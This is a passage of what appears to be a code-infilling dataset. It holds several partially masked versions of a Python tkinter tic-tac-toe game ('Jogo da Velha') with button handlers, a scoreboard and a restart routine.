self.botão1x1.grid(row=2, column=1, sticky='nsew')\n self.botão1x1.configure(command=self.botão1x1_clicado)\n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky='nsew')\n self.botão1x2.configure(command=self.botão1x2_clicado)\n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky='nsew')\n self.botão2x0.configure(command=self.botão2x0_clicado)\n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky='nsew')\n self.botão2x1.configure(command=self.botão2x1_clicado)\n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky='nsew')\n self.botão2x2.configure(command=self.botão2x2_clicado)\n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky='nsew')\n self.label_turno.configure(text='Turno de : {0}'.format(self.jogo.\n player), bg='Black', fg='Green', font='Arial 9')\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1, columnspan=1, sticky='nsew')\n self.reiniciar.configure(text='Reiniciar', font='Arial 18',\n activeforeground='Green', fg='Red', command=self.restart)\n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky='nsew')\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def clicou(self, i, j):\n print('Turno de: {0} '.format(self.jogo.player))\n print('Botão {0} x {1} clicado'.format(i, j))\n\n def botão0x0_clicado(self):\n 
self.clicou(0, 0)\n self.botão0x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão0x1_clicado(self):\n self.clicou(0, 1)\n self.botão0x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n <mask token>\n\n def botão1x0_clicado(self):\n self.clicou(1, 0)\n self.botão1x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x1_clicado(self):\n self.clicou(1, 1)\n self.botão1x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n <mask token>\n <mask token>\n\n def botão2x1_clicado(self):\n self.clicou(2, 1)\n self.botão2x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x2_clicado(self):\n self.clicou(2, 2)\n self.botão2x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Tabuleiro:\n\n def __init__(self):\n self.jogo = classejogo.Jogo()\n self.window = tk.Tk()\n self.window.title('Jogo da Velha')\n self.window.geometry('300x360+100+100')\n self.window.rowconfigure(0, minsize=30, weight=1)\n self.window.rowconfigure(1, minsize=100, weight=1)\n self.window.rowconfigure(2, minsize=100, weight=1)\n self.window.rowconfigure(3, minsize=100, weight=1)\n self.window.rowconfigure(4, minsize=30, weight=1)\n self.window.columnconfigure(0, minsize=100, weight=1)\n self.window.columnconfigure(1, minsize=100, weight=1)\n self.window.columnconfigure(2, minsize=100, weight=1)\n self.window.columnconfigure(3, minsize=100, weight=1)\n self.vitorias_X = tk.Label(self.window)\n self.vitorias_X.grid(row=0, column=0, sticky='nsew')\n self.vitorias_X.configure(text='Vitórias de X: {0} '.format(self.\n jogo.vitórias_x), font='Arial 10', bg='Blue', fg='White')\n self.placar = tk.Label(self.window)\n self.placar.grid(row=0, column=1, sticky='nsew')\n self.placar.configure(text='<- PLACAR ->', font='Arial 10', bg=\n 'Black', fg='Green')\n self.vitorias_O = tk.Label(self.window)\n self.vitorias_O.grid(row=0, column=2, sticky='nsew')\n self.vitorias_O.configure(text='Vitórias de O: {0} '.format(self.\n jogo.vitórias_o), font='Arial 10', bg='Yellow', fg='Black')\n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky='nsew')\n self.botão0x0.configure(command=self.botão0x0_clicado)\n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky='nsew')\n self.botão0x1.configure(command=self.botão0x1_clicado)\n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky='nsew')\n self.botão0x2.configure(command=self.botão0x2_clicado)\n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky='nsew')\n self.botão1x0.configure(command=self.botão1x0_clicado)\n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky='nsew')\n self.botão1x1.configure(command=self.botão1x1_clicado)\n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky='nsew')\n self.botão1x2.configure(command=self.botão1x2_clicado)\n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky='nsew')\n self.botão2x0.configure(command=self.botão2x0_clicado)\n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky='nsew')\n self.botão2x1.configure(command=self.botão2x1_clicado)\n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky='nsew')\n self.botão2x2.configure(command=self.botão2x2_clicado)\n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky='nsew')\n self.label_turno.configure(text='Turno de : {0}'.format(self.jogo.\n player), bg='Black', fg='Green', font='Arial 9')\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1, columnspan=1, sticky='nsew')\n self.reiniciar.configure(text='Reiniciar', font='Arial 18',\n activeforeground='Green', fg='Red', command=self.restart)\n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky='nsew')\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def clicou(self, i, j):\n print('Turno de: {0} '.format(self.jogo.player))\n print('Botão {0} x {1} clicado'.format(i, j))\n\n def botão0x0_clicado(self):\n 
self.clicou(0, 0)\n self.botão0x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão0x1_clicado(self):\n self.clicou(0, 1)\n self.botão0x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n <mask token>\n\n def botão1x0_clicado(self):\n self.clicou(1, 0)\n self.botão1x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x1_clicado(self):\n self.clicou(1, 1)\n self.botão1x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n <mask token>\n\n def botão2x0_clicado(self):\n self.clicou(2, 0)\n self.botão2x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x1_clicado(self):\n self.clicou(2, 1)\n self.botão2x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x2_clicado(self):\n self.clicou(2, 2)\n self.botão2x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def iniciar(self):\n self.window.mainloop()\n\n def restart(self):\n self.jogo.limpa_jogadas()\n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky='nsew')\n self.botão0x0.configure(command=self.botão0x0_clicado)\n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky='nsew')\n self.botão0x1.configure(command=self.botão0x1_clicado)\n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky='nsew')\n self.botão0x2.configure(command=self.botão0x2_clicado)\n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky='nsew')\n self.botão1x0.configure(command=self.botão1x0_clicado)\n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky='nsew')\n self.botão1x1.configure(command=self.botão1x1_clicado)\n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, 
sticky='nsew')\n self.botão1x2.configure(command=self.botão1x2_clicado)\n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky='nsew')\n self.botão2x0.configure(command=self.botão2x0_clicado)\n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky='nsew')\n self.botão2x1.configure(command=self.botão2x1_clicado)\n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky='nsew')\n self.botão2x2.configure(command=self.botão2x2_clicado)\n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky='nsew')\n self.label_turno.configure(text='Turno de : {0}'.format(self.jogo.\n player), bg='Black', fg='Green', font='Arial 9')\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1, columnspan=1, sticky='nsew')\n self.reiniciar.configure(text='Reiniciar', font='Arial 24',\n activeforeground='Green', fg='Red', command=self.restart)\n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky='nsew')\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n self.vitorias_X.configure(text='Vitórias de X: {0} '.format(self.\n jogo.vitórias_x), bg='Blue', fg='White')\n self.vitorias_O.configure(text='Vitórias de O: {0} '.format(self.\n jogo.vitórias_o), bg='Yellow', fg='Black')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Tabuleiro:\n\n def __init__(self):\n self.jogo = classejogo.Jogo()\n self.window = tk.Tk()\n self.window.title('Jogo da Velha')\n self.window.geometry('300x360+100+100')\n self.window.rowconfigure(0, minsize=30, weight=1)\n self.window.rowconfigure(1, minsize=100, weight=1)\n self.window.rowconfigure(2, minsize=100, weight=1)\n self.window.rowconfigure(3, minsize=100, weight=1)\n self.window.rowconfigure(4, minsize=30, weight=1)\n self.window.columnconfigure(0, minsize=100, weight=1)\n self.window.columnconfigure(1, minsize=100, weight=1)\n self.window.columnconfigure(2, minsize=100, weight=1)\n self.window.columnconfigure(3, minsize=100, weight=1)\n self.vitorias_X = tk.Label(self.window)\n self.vitorias_X.grid(row=0, column=0, sticky='nsew')\n self.vitorias_X.configure(text='Vitórias de X: {0} '.format(self.\n jogo.vitórias_x), font='Arial 10', bg='Blue', fg='White')\n self.placar = tk.Label(self.window)\n self.placar.grid(row=0, column=1, sticky='nsew')\n self.placar.configure(text='<- PLACAR ->', font='Arial 10', bg=\n 'Black', fg='Green')\n self.vitorias_O = tk.Label(self.window)\n self.vitorias_O.grid(row=0, column=2, sticky='nsew')\n self.vitorias_O.configure(text='Vitórias de O: {0} '.format(self.\n jogo.vitórias_o), font='Arial 10', bg='Yellow', fg='Black')\n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky='nsew')\n self.botão0x0.configure(command=self.botão0x0_clicado)\n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky='nsew')\n self.botão0x1.configure(command=self.botão0x1_clicado)\n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky='nsew')\n self.botão0x2.configure(command=self.botão0x2_clicado)\n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky='nsew')\n self.botão1x0.configure(command=self.botão1x0_clicado)\n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky='nsew')\n self.botão1x1.configure(command=self.botão1x1_clicado)\n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky='nsew')\n self.botão1x2.configure(command=self.botão1x2_clicado)\n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky='nsew')\n self.botão2x0.configure(command=self.botão2x0_clicado)\n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky='nsew')\n self.botão2x1.configure(command=self.botão2x1_clicado)\n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky='nsew')\n self.botão2x2.configure(command=self.botão2x2_clicado)\n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky='nsew')\n self.label_turno.configure(text='Turno de : {0}'.format(self.jogo.\n player), bg='Black', fg='Green', font='Arial 9')\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1, columnspan=1, sticky='nsew')\n self.reiniciar.configure(text='Reiniciar', font='Arial 18',\n activeforeground='Green', fg='Red', command=self.restart)\n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky='nsew')\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def clicou(self, i, j):\n print('Turno de: {0} '.format(self.jogo.player))\n print('Botão {0} x {1} clicado'.format(i, j))\n\n def botão0x0_clicado(self):\n 
self.clicou(0, 0)\n self.botão0x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão0x1_clicado(self):\n self.clicou(0, 1)\n self.botão0x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão0x2_clicado(self):\n self.clicou(0, 2)\n self.botão0x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x0_clicado(self):\n self.clicou(1, 0)\n self.botão1x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x1_clicado(self):\n self.clicou(1, 1)\n self.botão1x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x2_clicado(self):\n self.clicou(1, 2)\n self.botão1x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x0_clicado(self):\n self.clicou(2, 0)\n self.botão2x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x1_clicado(self):\n self.clicou(2, 1)\n self.botão2x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x2_clicado(self):\n self.clicou(2, 2)\n self.botão2x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def iniciar(self):\n self.window.mainloop()\n\n def restart(self):\n self.jogo.limpa_jogadas()\n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky='nsew')\n 
self.botão0x0.configure(command=self.botão0x0_clicado)\n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky='nsew')\n self.botão0x1.configure(command=self.botão0x1_clicado)\n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky='nsew')\n self.botão0x2.configure(command=self.botão0x2_clicado)\n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky='nsew')\n self.botão1x0.configure(command=self.botão1x0_clicado)\n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky='nsew')\n self.botão1x1.configure(command=self.botão1x1_clicado)\n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky='nsew')\n self.botão1x2.configure(command=self.botão1x2_clicado)\n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky='nsew')\n self.botão2x0.configure(command=self.botão2x0_clicado)\n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky='nsew')\n self.botão2x1.configure(command=self.botão2x1_clicado)\n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky='nsew')\n self.botão2x2.configure(command=self.botão2x2_clicado)\n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky='nsew')\n self.label_turno.configure(text='Turno de : {0}'.format(self.jogo.\n player), bg='Black', fg='Green', font='Arial 9')\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1, columnspan=1, sticky='nsew')\n self.reiniciar.configure(text='Reiniciar', font='Arial 24',\n activeforeground='Green', fg='Red', command=self.restart)\n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky='nsew')\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n self.vitorias_X.configure(text='Vitórias de X: {0} '.format(self.\n jogo.vitórias_x), bg='Blue', fg='White')\n self.vitorias_O.configure(text='Vitórias de O: {0} '.format(self.\n jogo.vitórias_o), bg='Yellow', fg='Black')\n\n\n<mask token>\njogodavelha.iniciar()\n",
"step-4": "<mask token>\n\n\nclass Tabuleiro:\n\n def __init__(self):\n self.jogo = classejogo.Jogo()\n self.window = tk.Tk()\n self.window.title('Jogo da Velha')\n self.window.geometry('300x360+100+100')\n self.window.rowconfigure(0, minsize=30, weight=1)\n self.window.rowconfigure(1, minsize=100, weight=1)\n self.window.rowconfigure(2, minsize=100, weight=1)\n self.window.rowconfigure(3, minsize=100, weight=1)\n self.window.rowconfigure(4, minsize=30, weight=1)\n self.window.columnconfigure(0, minsize=100, weight=1)\n self.window.columnconfigure(1, minsize=100, weight=1)\n self.window.columnconfigure(2, minsize=100, weight=1)\n self.window.columnconfigure(3, minsize=100, weight=1)\n self.vitorias_X = tk.Label(self.window)\n self.vitorias_X.grid(row=0, column=0, sticky='nsew')\n self.vitorias_X.configure(text='Vitórias de X: {0} '.format(self.\n jogo.vitórias_x), font='Arial 10', bg='Blue', fg='White')\n self.placar = tk.Label(self.window)\n self.placar.grid(row=0, column=1, sticky='nsew')\n self.placar.configure(text='<- PLACAR ->', font='Arial 10', bg=\n 'Black', fg='Green')\n self.vitorias_O = tk.Label(self.window)\n self.vitorias_O.grid(row=0, column=2, sticky='nsew')\n self.vitorias_O.configure(text='Vitórias de O: {0} '.format(self.\n jogo.vitórias_o), font='Arial 10', bg='Yellow', fg='Black')\n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky='nsew')\n self.botão0x0.configure(command=self.botão0x0_clicado)\n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky='nsew')\n self.botão0x1.configure(command=self.botão0x1_clicado)\n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky='nsew')\n self.botão0x2.configure(command=self.botão0x2_clicado)\n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky='nsew')\n self.botão1x0.configure(command=self.botão1x0_clicado)\n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky='nsew')\n self.botão1x1.configure(command=self.botão1x1_clicado)\n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky='nsew')\n self.botão1x2.configure(command=self.botão1x2_clicado)\n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky='nsew')\n self.botão2x0.configure(command=self.botão2x0_clicado)\n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky='nsew')\n self.botão2x1.configure(command=self.botão2x1_clicado)\n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky='nsew')\n self.botão2x2.configure(command=self.botão2x2_clicado)\n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky='nsew')\n self.label_turno.configure(text='Turno de : {0}'.format(self.jogo.\n player), bg='Black', fg='Green', font='Arial 9')\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1, columnspan=1, sticky='nsew')\n self.reiniciar.configure(text='Reiniciar', font='Arial 18',\n activeforeground='Green', fg='Red', command=self.restart)\n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky='nsew')\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def clicou(self, i, j):\n print('Turno de: {0} '.format(self.jogo.player))\n print('Botão {0} x {1} clicado'.format(i, j))\n\n def botão0x0_clicado(self):\n 
self.clicou(0, 0)\n self.botão0x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão0x1_clicado(self):\n self.clicou(0, 1)\n self.botão0x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão0x2_clicado(self):\n self.clicou(0, 2)\n self.botão0x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(0, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x0_clicado(self):\n self.clicou(1, 0)\n self.botão1x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x1_clicado(self):\n self.clicou(1, 1)\n self.botão1x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão1x2_clicado(self):\n self.clicou(1, 2)\n self.botão1x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(1, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x0_clicado(self):\n self.clicou(2, 0)\n self.botão2x0.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 0)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x1_clicado(self):\n self.clicou(2, 1)\n self.botão2x1.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 1)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def botão2x2_clicado(self):\n self.clicou(2, 2)\n self.botão2x2.configure(text=self.jogo.player, state='disabled',\n font='Arial 100 ')\n self.jogo.recebe_jogada(2, 2)\n self.label_turno.configure(text='Turno de: {0}'.format(self.jogo.\n player))\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n\n def iniciar(self):\n self.window.mainloop()\n\n def restart(self):\n self.jogo.limpa_jogadas()\n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky='nsew')\n 
